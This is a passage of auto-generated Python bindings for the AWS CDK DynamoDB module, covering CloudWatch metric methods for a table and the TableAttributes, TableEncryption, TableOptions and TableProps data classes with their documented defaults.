:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metric", [metric_name, props])
@jsii.member(jsii_name="metricConditionalCheckFailedRequests")
def metric_conditional_check_failed_requests(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the conditional check failed requests this table.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
default
:default: sum over a minute
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricConditionalCheckFailedRequests", [props])
@jsii.member(jsii_name="metricConsumedReadCapacityUnits")
def metric_consumed_read_capacity_units(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the consumed read capacity units this table.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
default
:default: sum over a minute
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricConsumedReadCapacityUnits", [props])
@jsii.member(jsii_name="metricConsumedWriteCapacityUnits")
def metric_consumed_write_capacity_units(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the consumed write capacity units this table.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
default
:default: sum over a minute
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricConsumedWriteCapacityUnits", [props])
@jsii.member(jsii_name="metricSuccessfulRequestLatency")
def metric_successful_request_latency(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the successful request latency this table.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
default
:default: avg over a minute
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricSuccessfulRequestLatency", [props])
@jsii.member(jsii_name="metricSystemErrors")
def metric_system_errors(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the system errors this table.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
default
:default: sum over a minute
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricSystemErrors", [props])
@jsii.member(jsii_name="metricUserErrors")
def metric_user_errors(
self,
*,
account: typing.Optional[str] = None,
color: typing.Optional[str] = None,
dimensions: typing.Optional[typing.Mapping[str, typing.Any]] = None,
label: typing.Optional[str] = None,
period: typing.Optional[aws_cdk.core.Duration] = None,
region: typing.Optional[str] = None,
statistic: typing.Optional[str] = None,
unit: typing.Optional[aws_cdk.aws_cloudwatch.Unit] = None,
) -> aws_cdk.aws_cloudwatch.Metric:
"""Metric for the user errors this table.
:param account: Account which this metric comes from. Default: - Deployment account.
:param color: The hex color code, prefixed with '#' (e.g. '#00ff00'), to use when this metric is rendered on a graph. The ``Color`` class has a set of standard colors that can be used here. Default: - Automatic color
:param dimensions: Dimensions of the metric. Default: - No dimensions.
:param label: Label for this metric when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
:param region: Region which this metric comes from. Default: - Deployment region.
:param statistic: What function to use for aggregating. Can be one of the following: - "Minimum" | "min" - "Maximum" | "max" - "Average" | "avg" - "Sum" | "sum" - "SampleCount | "n" - "pNN.NN" Default: Average
:param unit: Unit used to filter the metric stream. Only refer to datums emitted to the metric stream with the given unit and ignore all others. Only useful when datums are being emitted to the same metric stream under different units. The default is to use all matric datums in the stream, regardless of unit, which is recommended in nearly all cases. CloudWatch does not honor this property for graphs. Default: - All metric datums in the given metric stream
default
:default: sum over a minute
"""
props = aws_cdk.aws_cloudwatch.MetricOptions(
account=account,
color=color,
dimensions=dimensions,
label=label,
period=period,
region=region,
statistic=statistic,
unit=unit,
)
return jsii.invoke(self, "metricUserErrors", [props])
@jsii.member(jsii_name="validate")
def _validate(self) -> typing.List[str]:
"""Validate the table construct.
return
:return: an array of validation error message
"""
return jsii.invoke(self, "validate", [])
@builtins.property
@jsii.member(jsii_name="hasIndex")
def _has_index(self) -> bool:
"""Whether this table has indexes."""
return jsii.get(self, "hasIndex")
@builtins.property
@jsii.member(jsii_name="regionalArns")
def _regional_arns(self) -> typing.List[str]:
return jsii.get(self, "regionalArns")
@builtins.property
@jsii.member(jsii_name="tableArn")
def table_arn(self) -> str:
"""Arn of the dynamodb table.
attribute:
:attribute:: true
"""
return jsii.get(self, "tableArn")
@builtins.property
@jsii.member(jsii_name="tableName")
def table_name(self) -> str:
"""Table name of the dynamodb table.
attribute:
:attribute:: true
"""
return jsii.get(self, "tableName")
@builtins.property
@jsii.member(jsii_name="encryptionKey")
def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:
"""KMS encryption key, if this table uses a customer-managed encryption key."""
return jsii.get(self, "encryptionKey")
@builtins.property
@jsii.member(jsii_name="tableStreamArn")
def table_stream_arn(self) -> typing.Optional[str]:
"""ARN of the table's stream, if there is one.
attribute:
:attribute:: true
"""
return jsii.get(self, "tableStreamArn")
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.TableAttributes",
jsii_struct_bases=[],
name_mapping={
"encryption_key": "encryptionKey",
"global_indexes": "globalIndexes",
"local_indexes": "localIndexes",
"table_arn": "tableArn",
"table_name": "tableName",
"table_stream_arn": "tableStreamArn",
},
)
class TableAttributes:
def __init__(
self,
*,
encryption_key: typing.Optional[aws_cdk.aws_kms.IKey] = None,
global_indexes: typing.Optional[typing.List[str]] = None,
local_indexes: typing.Optional[typing.List[str]] = None,
table_arn: typing.Optional[str] = None,
table_name: typing.Optional[str] = None,
table_stream_arn: typing.Optional[str] = None,
) -> None:
"""Reference to a dynamodb table.
:param encryption_key: KMS encryption key, if this table uses a customer-managed encryption key. Default: - no key
:param global_indexes: The name of the global indexes set for this Table. Note that you need to set either this property, or {@link localIndexes}, if you want methods like grantReadData() to grant permissions for indexes as well as the table itself. Default: - no global indexes
:param local_indexes: The name of the local indexes set for this Table. Note that you need to set either this property, or {@link globalIndexes}, if you want methods like grantReadData() to grant permissions for indexes as well as the table itself. Default: - no local indexes
:param table_arn: The ARN of the dynamodb table. One of this, or {@link tableName}, is required. Default: - no table arn
:param table_name: The table name of the dynamodb table. One of this, or {@link tableArn}, is required. Default: - no table name
:param table_stream_arn: The ARN of the table's stream. Default: - no table stream
"""
self._values = {}
if encryption_key is not None:
self._values["encryption_key"] = encryption_key
if global_indexes is not None:
self._values["global_indexes"] = global_indexes
if local_indexes is not None:
self._values["local_indexes"] = local_indexes
if table_arn is not None:
self._values["table_arn"] = table_arn
if table_name is not None:
self._values["table_name"] = table_name
if table_stream_arn is not None:
self._values["table_stream_arn"] = table_stream_arn
@builtins.property
def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:
"""KMS encryption key, if this table uses a customer-managed encryption key.
default
:default: - no key
"""
return self._values.get("encryption_key")
@builtins.property
def global_indexes(self) -> typing.Optional[typing.List[str]]:
"""The name of the global indexes set for this Table.
Note that you need to set either this property,
or {@link localIndexes},
if you want methods like grantReadData()
to grant permissions for indexes as well as the table itself.
default
:default: - no global indexes
"""
return self._values.get("global_indexes")
@builtins.property
def local_indexes(self) -> typing.Optional[typing.List[str]]:
"""The name of the local indexes set for this Table.
Note that you need to set either this property,
or {@link globalIndexes},
if you want methods like grantReadData()
to grant permissions for indexes as well as the table itself.
default
:default: - no local indexes
"""
return self._values.get("local_indexes")
@builtins.property
def table_arn(self) -> typing.Optional[str]:
"""The ARN of the dynamodb table.
One of this, or {@link tableName}, is required.
default
:default: - no table arn
"""
return self._values.get("table_arn")
@builtins.property
def table_name(self) -> typing.Optional[str]:
"""The table name of the dynamodb table.
One of this, or {@link tableArn}, is required.
default
:default: - no table name
"""
return self._values.get("table_name")
@builtins.property
def table_stream_arn(self) -> typing.Optional[str]:
"""The ARN of the table's stream.
default
:default: - no table stream
"""
return self._values.get("table_stream_arn")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "TableAttributes(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.enum(jsii_type="@aws-cdk/aws-dynamodb.TableEncryption")
class TableEncryption(enum.Enum):
"""What kind of server-side encryption to apply to this table."""
DEFAULT = "DEFAULT"
"""Server-side KMS encryption with a master key owned by AWS."""
CUSTOMER_MANAGED = "CUSTOMER_MANAGED"
"""Server-side KMS encryption with a customer master key managed by customer.
If ``encryptionKey`` is specified, this key will be used, otherwise, one will be defined.
"""
AWS_MANAGED = "AWS_MANAGED"
"""Server-side KMS encryption with a master key managed by AWS."""
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.TableOptions",
jsii_struct_bases=[],
name_mapping={
"partition_key": "partitionKey",
"billing_mode": "billingMode",
"encryption": "encryption",
"encryption_key": "encryptionKey",
"point_in_time_recovery": "pointInTimeRecovery",
"read_capacity": "readCapacity",
"removal_policy": "removalPolicy",
"replication_regions": "replicationRegions",
"server_side_encryption": "serverSideEncryption",
"sort_key": "sortKey",
"stream": "stream",
"time_to_live_attribute": "timeToLiveAttribute",
"write_capacity": "writeCapacity",
},
)
class TableOptions:
def __init__(
self,
*,
partition_key: "Attribute",
billing_mode: typing.Optional["BillingMode"] = None,
encryption: typing.Optional["TableEncryption"] = None,
encryption_key: typing.Optional[aws_cdk.aws_kms.IKey] = None,
point_in_time_recovery: typing.Optional[bool] = None,
read_capacity: typing.Optional[jsii.Number] = None,
removal_policy: typing.Optional[aws_cdk.core.RemovalPolicy] = None,
replication_regions: typing.Optional[typing.List[str]] = None,
server_side_encryption: typing.Optional[bool] = None,
sort_key: typing.Optional["Attribute"] = None,
stream: typing.Optional["StreamViewType"] = None,
time_to_live_attribute: typing.Optional[str] = None,
write_capacity: typing.Optional[jsii.Number] = None,
) -> None:
"""Properties of a DynamoDB Table.
Use {@link TableProps} for all table properties
:param partition_key: Partition key attribute definition.
:param billing_mode: Specify how you are charged for read and write throughput and how you manage capacity. Default: PROVISIONED if ``replicationRegions`` is not specified, PAY_PER_REQUEST otherwise
:param encryption: Whether server-side encryption with an AWS managed customer master key is enabled. This property cannot be set if ``serverSideEncryption`` is set. Default: - server-side encryption is enabled with an AWS owned customer master key
:param encryption_key: External KMS key to use for table encryption. This property can only be set if ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED``. Default: - If ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED`` and this property is undefined, a new KMS key will be created and associated with this table.
:param point_in_time_recovery: Whether point-in-time recovery is enabled. Default: - point-in-time recovery is disabled
:param read_capacity: The read capacity for the table. Careful if you add Global Secondary Indexes, as those will share the table's provisioned throughput. Can only be provided if billingMode is Provisioned. Default: 5
:param removal_policy: The removal policy to apply to the DynamoDB Table. Default: RemovalPolicy.RETAIN
:param replication_regions: Regions where replica tables will be created. Default: - no replica tables are created
:param server_side_encryption: Whether server-side encryption with an AWS managed customer master key is enabled. This property cannot be set if ``encryption`` and/or ``encryptionKey`` is set. Default: - server-side encryption is enabled with an AWS owned customer master key
:param sort_key: Table sort key attribute definition. Default: no sort key
:param stream: When an item in the table is modified, StreamViewType determines what information is written to the stream for this table. Default: - streams are disabled unless ``replicationRegions`` is specified
:param time_to_live_attribute: The name of TTL attribute. Default: - TTL is disabled
:param write_capacity: The write capacity for the table. Careful if you add Global Secondary Indexes, as those will share the table's provisioned throughput. Can only be provided if billingMode is Provisioned. Default: 5
"""
if isinstance(partition_key, dict):
partition_key = Attribute(**partition_key)
if isinstance(sort_key, dict):
sort_key = Attribute(**sort_key)
self._values = {
"partition_key": partition_key,
}
if billing_mode is not None:
self._values["billing_mode"] = billing_mode
if encryption is not None:
self._values["encryption"] = encryption
if encryption_key is not None:
self._values["encryption_key"] = encryption_key
if point_in_time_recovery is not None:
self._values["point_in_time_recovery"] = point_in_time_recovery
if read_capacity is not None:
self._values["read_capacity"] = read_capacity
if removal_policy is not None:
self._values["removal_policy"] = removal_policy
if replication_regions is not None:
self._values["replication_regions"] = replication_regions
if server_side_encryption is not None:
self._values["server_side_encryption"] = server_side_encryption
if sort_key is not None:
self._values["sort_key"] = sort_key
if stream is not None:
self._values["stream"] = stream
if time_to_live_attribute is not None:
self._values["time_to_live_attribute"] = time_to_live_attribute
if write_capacity is not None:
self._values["write_capacity"] = write_capacity
@builtins.property
def partition_key(self) -> "Attribute":
"""Partition key attribute definition."""
return self._values.get("partition_key")
@builtins.property
def billing_mode(self) -> typing.Optional["BillingMode"]:
"""Specify how you are charged for read and write throughput and how you manage capacity.
default
:default: PROVISIONED if ``replicationRegions`` is not specified, PAY_PER_REQUEST otherwise
"""
return self._values.get("billing_mode")
@builtins.property
def encryption(self) -> typing.Optional["TableEncryption"]:
"""Whether server-side encryption with an AWS managed customer master key is enabled.
This property cannot be set if ``serverSideEncryption`` is set.
default
:default: - server-side encryption is enabled with an AWS owned customer master key
"""
return self._values.get("encryption")
@builtins.property
def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:
"""External KMS key to use for table encryption.
This property can only be set if ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED``.
default
:default:
- If ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED`` and this
property is undefined, a new KMS key will be created and associated with this table.
"""
return self._values.get("encryption_key")
@builtins.property
def point_in_time_recovery(self) -> typing.Optional[bool]:
"""Whether point-in-time recovery is enabled.
default
:default: - point-in-time recovery is disabled
"""
return self._values.get("point_in_time_recovery")
@builtins.property
def read_capacity(self) -> typing.Optional[jsii.Number]:
"""The read capacity for the table.
Careful if you add Global Secondary Indexes, as
those will share the table's provisioned throughput.
Can only be provided if billingMode is Provisioned.
default
:default: 5
"""
return self._values.get("read_capacity")
@builtins.property
def removal_policy(self) -> typing.Optional[aws_cdk.core.RemovalPolicy]:
"""The removal policy to apply to the DynamoDB Table.
default
:default: RemovalPolicy.RETAIN
"""
return self._values.get("removal_policy")
@builtins.property
def replication_regions(self) -> typing.Optional[typing.List[str]]:
"""Regions where replica tables will be created.
default
:default: - no replica tables are created
stability
:stability: experimental
"""
return self._values.get("replication_regions")
@builtins.property
def server_side_encryption(self) -> typing.Optional[bool]:
"""Whether server-side encryption with an AWS managed customer master key is enabled.
This property cannot be set if ``encryption`` and/or ``encryptionKey`` is set.
default
:default: - server-side encryption is enabled with an AWS owned customer master key
deprecated
:deprecated:
This property is deprecated. In order to obtain the same behavior as
enabling this, set the ``encryption`` property to ``TableEncryption.AWS_MANAGED`` instead.
stability
:stability: deprecated
"""
return self._values.get("server_side_encryption")
@builtins.property
def sort_key(self) -> typing.Optional["Attribute"]:
"""Table sort key attribute definition.
default
:default: no sort key
"""
return self._values.get("sort_key")
@builtins.property
def stream(self) -> typing.Optional["StreamViewType"]:
"""When an item in the table is modified, StreamViewType determines what information is written to the stream for this table.
default
:default: - streams are disabled unless ``replicationRegions`` is specified
"""
return self._values.get("stream")
@builtins.property
def time_to_live_attribute(self) -> typing.Optional[str]:
"""The name of TTL attribute.
default
:default: - TTL is disabled
"""
return self._values.get("time_to_live_attribute")
@builtins.property
def write_capacity(self) -> typing.Optional[jsii.Number]:
"""The write capacity for the table.
Careful if you add Global Secondary Indexes, as
those will share the table's provisioned throughput.
Can only be provided if billingMode is Provisioned.
default
:default: 5
"""
return self._values.get("write_capacity")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "TableOptions(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.TableProps",
jsii_struct_bases=[TableOptions],
name_mapping={
"partition_key": "partitionKey",
"billing_mode": "billingMode",
"encryption": "encryption",
"encryption_key": "encryptionKey",
"point_in_time_recovery": "pointInTimeRecovery",
"read_capacity": "readCapacity",
"removal_policy": "removalPolicy",
"replication_regions": "replicationRegions",
"server_side_encryption": "serverSideEncryption",
"sort_key": "sortKey",
"stream": "stream",
"time_to_live_attribute": "timeToLiveAttribute",
"write_capacity": "writeCapacity",
"table_name": "tableName",
},
)
class TableProps(TableOptions):
def __init__(
self,
*,
partition_key: "Attribute",
billing_mode: typing.Optional["BillingMode"] = None,
encryption: typing.Optional["TableEncryption"] = None,
encryption_key: typing.Optional[aws_cdk.aws_kms.IKey] = None,
point_in_time_recovery: typing.Optional[bool] = None,
read_capacity: typing.Optional[jsii.Number] = None,
removal_policy: typing.Optional[aws_cdk.core.RemovalPolicy] = None,
replication_regions: typing.Optional[typing.List[str]] = None,
server_side_encryption: typing.Optional[bool] = None,
sort_key: typing.Optional["Attribute"] = None,
stream: typing.Optional["StreamViewType"] = None,
time_to_live_attribute: typing.Optional[str] = None,
write_capacity: typing.Optional[jsii.Number] = None,
table_name: typing.Optional[str] = None,
) -> None:
"""Properties for a DynamoDB Table.
:param partition_key: Partition key attribute definition.
:param billing_mode: Specify how you are charged for read and write throughput and how you manage capacity. Default: PROVISIONED if ``replicationRegions`` is not specified, PAY_PER_REQUEST otherwise
:param encryption: Whether server-side encryption with an AWS managed customer master key is enabled. This property cannot be set if ``serverSideEncryption`` is set. Default: - server-side encryption is enabled with an AWS owned customer master key
:param encryption_key: External KMS key to use for table encryption. This property can only be set if ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED``. Default: - If ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED`` and this property is undefined, a new KMS key will be created and associated with this table.
:param point_in_time_recovery: Whether point-in-time recovery is enabled. Default: - point-in-time recovery is disabled
:param read_capacity: The read capacity for the table. Careful if you add Global Secondary Indexes, as those will share the table's provisioned throughput. Can only be provided if billingMode is Provisioned. Default: 5
:param removal_policy: The removal policy to apply to the DynamoDB Table. Default: RemovalPolicy.RETAIN
:param replication_regions: Regions where replica tables will be created. Default: - no replica tables are created
:param server_side_encryption: Whether server-side encryption with an AWS managed customer master key is enabled. This property cannot be set if ``encryption`` and/or ``encryptionKey`` is set. Default: - server-side encryption is enabled with an AWS owned customer master key
:param sort_key: Table sort key attribute definition. Default: no sort key
:param stream: When an item in the table is modified, StreamViewType determines what information is written to the stream for this table. Default: - streams are disabled unless ``replicationRegions`` is specified
:param time_to_live_attribute: The name of TTL attribute. Default: - TTL is disabled
:param write_capacity: The write capacity for the table. Careful if you add Global Secondary Indexes, as those will share the table's provisioned throughput. Can only be provided if billingMode is Provisioned. Default: 5
:param table_name: Enforces a particular physical table name. Default:
"""
if isinstance(partition_key, dict):
partition_key = Attribute(**partition_key)
if isinstance(sort_key, dict):
sort_key = Attribute(**sort_key)
self._values = {
"partition_key": partition_key,
}
if billing_mode is not None:
self._values["billing_mode"] = billing_mode
if encryption is not None:
self._values["encryption"] = encryption
if encryption_key is not None:
self._values["encryption_key"] = encryption_key
if point_in_time_recovery is not None:
self._values["point_in_time_recovery"] = point_in_time_recovery
if read_capacity is not None:
self._values["read_capacity"] = read_capacity
if removal_policy is not None:
self._values["removal_policy"] = removal_policy
if replication_regions is not None:
self._values["replication_regions"] = replication_regions
if server_side_encryption is not None:
self._values["server_side_encryption"] = server_side_encryption
if sort_key is not None:
self._values["sort_key"] = sort_key
if stream is not None:
self._values["stream"] = stream
if time_to_live_attribute is not None:
self._values["time_to_live_attribute"] = time_to_live_attribute
if write_capacity is not None:
self._values["write_capacity"] = write_capacity
if table_name is not None:
self._values["table_name"] = table_name
@builtins.property
def partition_key(self) -> "Attribute":
"""Partition key attribute definition."""
return self._values.get("partition_key")
@builtins.property
def billing_mode(self) -> typing.Optional["BillingMode"]:
"""Specify how you are charged for read and write throughput and how you manage capacity.
default
:default: PROVISIONED if ``replicationRegions`` is not specified, PAY_PER_REQUEST otherwise
"""
return self._values.get("billing_mode")
@builtins.property
def encryption(self) -> typing.Optional["TableEncryption"]:
"""Whether server-side encryption with an AWS managed customer master key is enabled.
This property cannot be set if ``serverSideEncryption`` is set.
default
:default: - server-side encryption is enabled with an AWS owned customer master key
"""
return self._values.get("encryption")
@builtins.property
def encryption_key(self) -> typing.Optional[aws_cdk.aws_kms.IKey]:
"""External KMS key to use for table encryption.
This property can only be set if ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED``.
default
:default:
- If ``encryption`` is set to ``TableEncryption.CUSTOMER_MANAGED`` and this
property is undefined, a new KMS key will be created and associated with this table.
"""
return self._values.get("encryption_key")
@builtins.property
def point_in_time_recovery(self) -> typing.Optional[bool]:
"""Whether point-in-time recovery is enabled.
default
:default: - point-in-time recovery is disabled
"""
return self._values.get("point_in_time_recovery")
@builtins.property
def read_capacity(self) -> typing.Optional[jsii.Number]:
"""The read capacity for the table.
Careful if you add Global Secondary Indexes, as
those will share the table's provisioned throughput.
Can only be provided if billingMode is Provisioned.
default
:default: 5
"""
return self._values.get("read_capacity")
@builtins.property
def removal_policy(self) -> typing.Optional[aws_cdk.core.RemovalPolicy]:
"""The removal policy to apply to the DynamoDB Table.
default
:default: RemovalPolicy.RETAIN
"""
return self._values.get("removal_policy")
@builtins.property
def replication_regions(self) -> typing.Optional[typing.List[str]]:
"""Regions where replica tables will be created.
default
:default: - no replica tables are created
stability
:stability: experimental
"""
return self._values.get("replication_regions")
@builtins.property
def server_side_encryption(self) -> typing.Optional[bool]:
"""Whether server-side encryption with an AWS managed customer master key is enabled.
This property cannot be set if ``encryption`` and/or ``encryptionKey`` is set.
default
:default: - server-side encryption is enabled with an AWS owned customer master key
deprecated
:deprecated:
This property is deprecated. In order to obtain the same behavior as
enabling this, set the ``encryption`` property to ``TableEncryption.AWS_MANAGED`` instead.
stability
:stability: deprecated
"""
return self._values.get("server_side_encryption")
@builtins.property
def sort_key(self) -> typing.Optional["Attribute"]:
"""Table sort key attribute definition.
default
:default: no sort key
"""
return self._values.get("sort_key")
@builtins.property
def stream(self) -> typing.Optional["StreamViewType"]:
"""When an item in the table is modified, StreamViewType determines what information is written to the stream for this table.
default
:default: - streams are disabled unless ``replicationRegions`` is specified
"""
return self._values.get("stream")
@builtins.property
def time_to_live_attribute(self) -> typing.Optional[str]:
"""The name of TTL attribute.
default
:default: - TTL is disabled
"""
return self._values.get("time_to_live_attribute")
@builtins.property
def write_capacity(self) -> typing.Optional[jsii.Number]:
"""The write capacity for the table.
Careful if you add Global Secondary Indexes, as
those will share the table's provisioned throughput.
Can only be provided if billingMode is Provisioned.
default
:default: 5
"""
return self._values.get("write_capacity")
@builtins.property
def table_name(self) -> typing.Optional[str]:
"""Enforces a particular physical table name.
default
:default:
"""
return self._values.get("table_name")
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return "TableProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-dynamodb.UtilizationScalingProps",
jsii_struct_bases=[aws_cdk.aws_applicationautoscaling.BaseTargetTrackingProps],
name_mapping={
"disable_scale_in": "disableScaleIn",
"policy_name": "policyName",
